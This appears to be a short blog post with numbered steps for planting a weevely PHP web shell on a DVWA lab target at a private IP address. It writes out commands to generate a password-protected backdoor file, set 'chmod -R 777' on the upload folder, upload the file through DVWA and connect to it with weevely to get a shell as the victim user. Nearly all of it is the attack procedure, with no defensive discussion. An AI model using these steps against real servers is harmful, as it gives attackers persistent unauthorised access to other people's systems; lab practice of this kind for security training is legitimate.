1. apache enabled through terminal
2.
mysql enabled through terminal
3.
find out ip adres targets
4.
entry into the target dvwa
5. for backdoor commands via a terminal that is #weevely generate abar4321 download.php
6.
because the server / laptop targets no space to upload a backdoor that we created earlier, there should be a command to make the upload folder with the measures put position at / var / www / dvwa
7. carried command #chmod -R 777 hackable
8.
enter dvwa and do upload files that we created earlier the downloaded file
9.
open the downloaded file
11.
execute commands #weevely http://192.168.56.101/dvwa/hackable/uploads/download.php abar4321
the purpose of these commands is someone to open the backdoor file so that we can open our backdoor victim system as user
12.
the view that the backdoor has been successfully installed and to prove we are already in the victim system, we can use the command ls, pwd, or anything that proves we are on the victim system
Tidak ada komentar:
Posting Komentar